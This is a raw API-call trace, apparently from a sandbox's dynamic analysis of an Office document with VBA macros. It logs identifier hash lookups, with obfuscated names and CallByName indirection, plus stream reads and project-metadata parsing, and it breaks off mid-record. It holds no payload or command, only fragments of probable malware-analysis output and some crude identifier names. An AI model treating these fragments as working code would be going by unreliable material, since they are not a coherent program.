LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RectsRet") returned 0x10b350 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCX") returned 0x109c18 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sinus") returned 0x10ce69 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mapRender") returned 0x1009e2 [0030.293] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="mapRender" | out: _Dst="mapRender") returned 0x0 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CallByName") returned 0x1079f5 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SubProperty") returned 0x109bbc [0030.293] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="SubProperty" | out: _Dst="SubProperty") returned 0x0 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VbMethod") returned 0x10d6d4 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_PokerFace") returned 0x10fd2f [0030.293] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Bonez_Dadly_PokerFace" | out: _Dst="Bonez_Dadly_PokerFace") returned 0x0 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CallByName") returned 0x1079f5 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CofeeShop") returned 0x10ac6a [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VbGet") returned 0x10f4c3 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rapeObject") returned 0x1096ef [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rapeObject") returned 0x1096ef [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="peascock") returned 0x10878c [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uch") returned 0x10ddca [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RectsRet") returned 0x10b350 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCX") returned 0x109c18 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCY") returned 0x109c15 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sy") returned 0x105f29 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uch") returned 0x10ddca [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RectsRet") returned 0x10b350 [0030.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCY") returned 0x109c15 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sx") returned 0x105f2c [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uch") returned 0x10ddca [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RectsRet") returned 0x10b350 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51792, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0030.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51792, cbMultiByte=6, lpWideCharStr=0x766cf98, cchWideChar=6 | out: lpWideCharStr="Vertik") returned 6 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="CofeeShop" | out: _Dst="CofeeShop") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="smbi" | out: _Dst="smbi") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="AlertNE" | out: _Dst="AlertNE") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Stocke" | out: _Dst="Stocke") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Bonez_Dadly_FLAME" | out: _Dst="Bonez_Dadly_FLAME") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="MakeFarplane" | out: _Dst="MakeFarplane") returned 0x0 [0030.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50672, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50672, cbMultiByte=8, lpWideCharStr=0x766cf98, cchWideChar=8 | out: lpWideCharStr="FindNext") returned 8 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="R" | out: _Dst="R") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="SubProperty" | out: _Dst="SubProperty") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Bonez_Dadly_aifde" | out: _Dst="Bonez_Dadly_aifde") returned 0x0 [0030.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a606ee, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0030.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a606ee, cbMultiByte=15, lpWideCharStr=0xb4e31c8, cchWideChar=15 | out: lpWideCharStr="AnimTransferMap") returned 15 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="Bonez_Dadly_avatar" | out: _Dst="Bonez_Dadly_avatar") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="MarkusPils" | out: _Dst="MarkusPils") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="SubProperty" | out: _Dst="SubProperty") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="Bonez_Dadly_aifde" | out: _Dst="Bonez_Dadly_aifde") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="Bonez_Dadly_VEAM" | out: _Dst="Bonez_Dadly_VEAM") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="IsMapTransfer" | out: _Dst="IsMapTransfer") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="PValue" | out: _Dst="PValue") returned 0x0 [0030.296] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="L" | out: _Dst="L") returned 0x0 [0030.297] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.297] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51602, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0030.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51602, cbMultiByte=16, lpWideCharStr=0xb4e31c8, cchWideChar=16 | out: lpWideCharStr="AnimTransferMap2") returned 16 [0030.297] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="cry" | out: _Dst="cry") returned 0x0 [0030.297] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="CofeeShop" | out: _Dst="CofeeShop") returned 0x0 [0030.297] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="c" | out: _Dst="c") returned 0x0 [0030.297] CExposedStream::Read () returned 0x0 [0030.297] CExposedStream::Read () returned 0x0 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="writer") returned 0x1076f6 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Encoding") returned 0x1052bc [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ASCII") returned 0x100806 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetBytes") returned 0x1090e9 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="writer") returned 0x1076f6 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Encoding") returned 0x1052bc [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ASCII") returned 0x100806 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetBytes") returned 0x1090e9 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="writer") returned 0x1076f6 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="writer") returned 0x1076f6 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CUS") returned 0x10802d [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hort") returned 0x109c64 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="writer") returned 0x1076f6 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CUS") returned 0x10802d [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hort") returned 0x109c64 [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lab1") returned 0x1065ca [0030.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CallByName") returned 0x1079f5 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CofeeShop") returned 0x10ac6a [0030.298] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="CofeeShop" | out: _Dst="CofeeShop") returned 0x0 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OptionButton2") returned 0x10406c [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tag") returned 0x10d826 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VbMethod") returned 0x10d6d4 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_System") returned 0x106c7c [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SpinButton1") returned 0x1038bd [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tag") returned 0x10d826 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stream") returned 0x10f92a [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SeekOrigin") returned 0x10e507 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="begin") returned 0x10e01b [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Play") returned 0x10b753 [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.298] CExposedStream::Read () returned 0x0 [0030.298] CExposedStream::Release () returned 0x1 [0030.298] CExposedStream::Release () returned 0x0 [0030.298] CExposedStream::Release () returned 0x0 [0030.298] IMalloc:Free (This=0x7fefe015380, pv=0xb410560) [0030.298] IMalloc:Free (This=0x7fefe015380, pv=0xb40e530) [0030.298] IMalloc:Free (This=0x7fefe015380, pv=0xb500fb0) [0030.298] IMalloc:Free (This=0x7fefe015380, pv=0xb4fef80) [0030.298] CExposedStream::Seek () returned 0x80030102 [0030.298] CExposedStream::Release () returned 0x0 [0030.298] IMalloc:Free (This=0x7fefe015380, pv=0x784a9b0) [0030.298] lstrcpyA (in: lpString1=0x93b867c, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0030.298] CExposedDocFile::Stat () returned 0x0 [0030.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93b867c, cbMultiByte=-1, lpWideCharStr=0x2e7940, cchWideChar=8 | out: lpWideCharStr="PROJECT") returned 8 [0030.299] CExposedDocFile::OpenStream () returned 0x0 [0030.299] CExposedDocFile::AddRef () returned 0x3 [0030.299] CExposedStream::Stat () returned 0x0 [0030.299] CExposedStream::Read () returned 0x0 [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x91dded0, lpString2="" | out: lpString1="") returned="" [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x91ddf10, lpString2="" | out: lpString1="") returned="" [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x91ddf50, lpString2="" | out: lpString1="") returned="" [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x91ddf90, lpString2="" | out: lpString1="") returned="" [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x93b8ba0, lpString2="" | out: lpString1="") returned="" [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x93b8c10, lpString2="" | out: lpString1="") returned="" [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x93b8c30, lpString2="" | out: lpString1="") returned="" [0030.299] lstrlenA (lpString="") returned 0 [0030.299] lstrcpyA (in: lpString1=0x93b8c50, lpString2="" | out: lpString1="") returned="" [0030.300] lstrcpynA (in: lpString1=0x93b9000, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0030.300] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0030.300] lstrcpyA (in: lpString1=0x93b9240, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0030.300] lstrcpynA (in: lpString1=0x93b92a0, lpString2="Workspace", iMaxLength=256 | out: lpString1="Workspace") returned="Workspace" [0030.300] lstrlenA (lpString="78, 78, 1610, 442, ") returned 19 [0030.300] lstrcpyA (in: lpString1=0x93b94e0, lpString2="78, 78, 1610, 442, " | out: lpString1="78, 78, 1610, 442, ") returned="78, 78, 1610, 442, " [0030.300] lstrlenA (lpString="0, 0, 0, 0, C, 26, 26, 1614, 711, ") returned 34 [0030.300] lstrcpyA (in: lpString1=0x93b7dc0, lpString2="0, 0, 0, 0, C, 26, 26, 1614, 711, " | out: lpString1="0, 0, 0, 0, C, 26, 26, 1614, 711, ") returned="0, 0, 0, 0, C, 26, 26, 1614, 711, " [0030.300] lstrlenA (lpString="50, 50, 724, 530, ") returned 18 [0030.300] lstrcpyA (in: lpString1=0x93b9790, lpString2="50, 50, 724, 530, " | out: lpString1="50, 50, 724, 530, ") returned="50, 50, 724, 530, " [0030.300] lstrlenA (lpString="104, 104, 1636, 468, ") returned 21 [0030.300] lstrcpyA (in: lpString1=0x93b97b0, lpString2="104, 104, 1636, 468, " | out: lpString1="104, 104, 1636, 468, ") returned="104, 104, 1636, 468, " [0030.301] lstrlenA (lpString="25, 25, 623, 505, ") returned 18 [0030.301] lstrcpyA (in: lpString1=0x93b97d0, lpString2="25, 25, 623, 505, " | out: lpString1="25, 25, 623, 505, ") returned="25, 25, 623, 505, " [0030.301] lstrlenA (lpString="52, 52, 1640, 737, ") returned 19 [0030.301] lstrcpyA (in: lpString1=0x93b97f0, lpString2="52, 52, 1640, 737, " | out: lpString1="52, 52, 1640, 737, ") returned="52, 52, 1640, 737, " [0030.301] lstrlenA (lpString="50, 50, 648, 530, Z") returned 19 [0030.301] lstrcpyA (in: lpString1=0x93b9810, lpString2="50, 50, 648, 530, Z" | out: lpString1="50, 50, 648, 530, Z") returned="50, 50, 648, 530, Z" [0030.301] CExposedDocFile::OpenStream () returned 0x0 [0030.301] CExposedStream::Stat () returned 0x0 [0030.301] CExposedStream::Read () returned 0x0 [0030.301] CExposedStream::Release () returned 0x0 [0030.301] lstrcpyA (in: lpString1=0x91ddef0, lpString2="" | out: lpString1="") returned="" [0030.301] lstrcmpiA (lpString1="ThisDocument", lpString2="ThisDocument") returned 0 [0030.301] lstrlenA (lpString="ThisDocument") returned 12 [0030.301] lstrcpyA (in: lpString1=0x91ddf30, lpString2="" | out: lpString1="") returned="" [0030.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93b8937, cbMultiByte=-1, lpWideCharStr=0x2e7920, cchWideChar=39 | out: lpWideCharStr="{AC9F2F90-E877-11CE-9F68-00AA00574A4F}") returned 39 [0030.302] CLSIDFromString (in: lpsz="{AC9F2F90-E877-11CE-9F68-00AA00574A4F}", pclsid=0x2e7970 | out: pclsid=0x2e7970*(Data1=0xac9f2f90, Data2=0xe877, Data3=0x11ce, Data4=([0]=0x9f, [1]=0x68, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0030.378] lstrcpyA (in: lpString1=0x91ddf70, lpString2="" | out: lpString1="") returned="" [0030.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93b8969, cbMultiByte=-1, lpWideCharStr=0x2e7890, cchWideChar=4 | out: lpWideCharStr="RDM") returned 4 [0030.378] CExposedDocFile::OpenStorage () returned 0x0 [0030.391] lstrcpyA (in: lpString1=0x93bacdc, lpString2="\x03VBFrame" | out: lpString1="\x03VBFrame") returned="\x03VBFrame" [0030.391] CExposedDocFile::Stat () returned 0x0 [0030.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93bacdc, cbMultiByte=-1, lpWideCharStr=0x2e7760, cchWideChar=9 | out: lpWideCharStr="\x03VBFrame") returned 9 [0030.391] CExposedDocFile::OpenStream () returned 0x0 [0030.391] CExposedDocFile::AddRef () returned 0x2 [0030.391] CoCreateGuid (in: pguid=0x93bae50 | out: pguid=0x93bae50*(Data1=0x47576425, Data2=0x29b6, Data3=0x4b20, Data4=([0]=0x96, [1]=0x9b, [2]=0xe4, [3]=0xb0, [4]=0x6b, [5]=0xcd, [6]=0xb5, [7]=0xd3))) returned 0x0 [0030.391] CoCreateGuid (in: pguid=0x93bae60 | out: pguid=0x93bae60*(Data1=0xad714164, Data2=0x705c, Data3=0x4aa2, Data4=([0]=0xb1, [1]=0xad, [2]=0x2e, [3]=0xf4, [4]=0xc0, [5]=0x31, [6]=0x1f, [7]=0x76))) returned 0x0 [0030.391] GetCurrentThreadId () returned 0x9dc [0030.391] GetCurrentThreadId () returned 0x9dc [0030.391] CExposedStream::Stat () returned 0x0 [0030.391] GlobalLock (hMem=0x5000088) returned 0x71576f0 [0030.391] GlobalSize (hMem=0x5000088) returned 0x200 [0030.391] CExposedStream::Read () returned 0x0 [0030.391] lstrcmpiA (lpString1="VERSION", lpString2="VERSION") returned 0 [0030.391] lstrcmpiA (lpString1="Begin", lpString2="Begin") returned 0 [0030.391] 